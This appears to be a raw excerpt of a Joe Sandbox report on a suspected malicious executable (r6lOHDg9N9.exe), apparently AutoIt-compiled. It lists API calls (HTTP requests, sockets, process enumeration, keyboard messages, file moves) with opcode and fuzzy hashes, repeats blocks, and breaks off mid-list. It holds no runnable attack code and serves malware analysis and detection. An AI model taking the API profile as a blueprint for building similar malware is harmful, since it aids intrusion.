                                                                              Strings
                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                              • C:\Users\user\Desktop\r6lOHDg9N9.exe, xrefs: 00437189
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message_printf
                                                                              • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\r6lOHDg9N9.exe
                                                                              • API String ID: 220974073-1043181869
                                                                              APIs
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\r6lOHDg9N9.exe,?,C:\Users\user\Desktop\r6lOHDg9N9.exe,004A8E80,C:\Users\user\Desktop\r6lOHDg9N9.exe,0040F3D2), ref: 0040FFCA
                                                                                • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                              Similarity
                                                                              • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 978794511-0
                                                                              APIs
                                                                                • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                              • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                              • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                              Similarity
                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                              • String ID:
                                                                              • API String ID: 2014098862-0
                                                                              Similarity
                                                                              • API ID: AddressProc_malloc$_strcat_strlen
                                                                              • String ID: AU3_FreeVar
                                                                              • API String ID: 2184576858-771828931
                                                                              APIs
                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                              • DestroyWindow.USER32(?), ref: 0042A751
                                                                              • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                              • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                              Similarity
                                                                              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                              • String ID: close all
                                                                              • API String ID: 4174999648-3243417748
                                                                              APIs
                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                              • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                              Similarity
                                                                              • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                              • String ID:
                                                                              • API String ID: 1291720006-3916222277
                                                                              Similarity
                                                                              • API ID: ErrorLastselect
                                                                              • String ID: HH
                                                                              • API String ID: 215497628-2761332787
                                                                              Similarity
                                                                              • API ID: __snwprintf__wcsicoll_wcscpy
                                                                              • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                              • API String ID: 1729044348-3708979750
                                                                              APIs
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\r6lOHDg9N9.exe,?,C:\Users\user\Desktop\r6lOHDg9N9.exe,004A8E80,C:\Users\user\Desktop\r6lOHDg9N9.exe,0040F3D2), ref: 0040FFCA
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                              • _wcscat.LIBCMT ref: 0044BCAA
                                                                              • _wcslen.LIBCMT ref: 0044BCB7
                                                                              • _wcslen.LIBCMT ref: 0044BCCB
                                                                              • SHFileOperationW.SHELL32 ref: 0044BD16
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \*.*
• API String ID: 2326526234-1173974218
• Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
• Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
• Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
• Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
APIs
  • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
• _wcslen.LIBCMT ref: 004366DD
• GetFileAttributesW.KERNEL32(?), ref: 00436700
• GetLastError.KERNEL32 ref: 0043670F
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
• _wcsrchr.LIBCMT ref: 0043674C
  • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
• String ID: \
• API String ID: 321622961-2967466578
• Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
• Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
• Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
• Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
• Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
• Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
• Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
Similarity
• Opcode ID: 61459f4a8200ef3d52de203114b28894f5d4b3bd8466eb3c739413db927d5df4
• Instruction ID: 650af14def374fe6fd11052fbef22cb8aa6c894e3601bf285572d08ae3c4fed9
• Opcode Fuzzy Hash: 61459f4a8200ef3d52de203114b28894f5d4b3bd8466eb3c739413db927d5df4
• Instruction Fuzzy Hash: 439192726043009BD710EF65DC82BABB3E9AFD4714F004D2EF548E7291D779E944875A
APIs
• EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
• OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
• EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
• GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
• __wsplitpath.LIBCMT ref: 00436FA0
• _wcscat.LIBCMT ref: 00436FB2
• __wcsicoll.LIBCMT ref: 00436FC4
• CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
Similarity
• API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
• API String ID: 2903788889-0
• Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
• Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
• Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
• Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
APIs
• DeleteObject.GDI32(?), ref: 0044157D
• GetDC.USER32(00000000), ref: 00441585
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
• ReleaseDC.USER32(00000000,00000000), ref: 0044159B
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• API String ID: 3864802216-0
• Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
• Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
• Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
• Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
APIs
• ___set_flsgetvalue.LIBCMT ref: 004140E1
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 004140EC
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004140FF
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
• ExitThread.KERNEL32 ref: 0041410F
• GetCurrentThreadId.KERNEL32 ref: 00414115
• __freefls@4.LIBCMT ref: 00414135
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
Similarity
• API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• API String ID: 1925773019-0
• Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
• Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
• Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
• Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
APIs
• VariantClear.OLEAUT32(00000038), ref: 004357C3
• VariantClear.OLEAUT32(00000058), ref: 004357C9
• VariantClear.OLEAUT32(00000068), ref: 004357CF
• VariantClear.OLEAUT32(00000078), ref: 004357D5
• VariantClear.OLEAUT32(00000088), ref: 004357DE
• VariantClear.OLEAUT32(00000048), ref: 004357E4
• VariantClear.OLEAUT32(00000098), ref: 004357ED
• VariantClear.OLEAUT32(000000A8), ref: 004357F6
Similarity
• API ID: ClearVariant
• API String ID: 1473721057-0
• Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
• Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
• Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
• Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00464ADE
  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
• inet_addr.WSOCK32(?), ref: 00464B1F
• gethostbyname.WSOCK32(?), ref: 00464B29
• _memset.LIBCMT ref: 00464B92
• GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
• GlobalFree.KERNEL32(00000000), ref: 00464CDE
• WSACleanup.WSOCK32 ref: 00464CE4
Similarity
• API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
• API String ID: 3424476444-0
• Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
• Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
• Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
• Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
APIs
• GetSystemMetrics.USER32(0000000F), ref: 00440B7B
Similarity
• API ID: MetricsSystem
• API String ID: 4116985748-0
• Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
• Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
• Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
• Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID:
                                                                              • API String ID: 535477410-0
                                                                              • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                              • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                              • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                              • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                              APIs
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • _memset.LIBCMT ref: 004538C4
                                                                              • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                              • _wcslen.LIBCMT ref: 00453960
                                                                              • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                              • String ID: 0
                                                                              • API String ID: 3530711334-4108050209
                                                                              • Opcode ID: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                              • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                              • Opcode Fuzzy Hash: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                              • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                              • String ID: HH
                                                                              • API String ID: 3488606520-2761332787
                                                                              • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                              • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                              • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                              • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                              • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                              • LineTo.GDI32(?,?), ref: 004474BF
                                                                              • CloseFigure.GDI32(?), ref: 004474C6
                                                                              • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                              • Rectangle.GDI32(?,?), ref: 004474F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                              • String ID:
                                                                              • API String ID: 4082120231-0
                                                                              • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                              • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                              • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                              • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                              • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                              • LineTo.GDI32(?,?), ref: 004474BF
                                                                              • CloseFigure.GDI32(?), ref: 004474C6
                                                                              • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                              • Rectangle.GDI32(?,?), ref: 004474F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                              • String ID:
                                                                              • API String ID: 4082120231-0
                                                                              • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                              • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                              • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                              • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                              • String ID:
                                                                              • API String ID: 288456094-0
                                                                              • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                              • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                              • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                              • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 004449B0
                                                                              • GetKeyboardState.USER32(?), ref: 004449C3
                                                                              • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                              • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                              • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                              • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 00444BA9
                                                                              • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                              • SetKeyboardState.USER32(?), ref: 00444C08
                                                                              • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                              • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                              • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                              • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
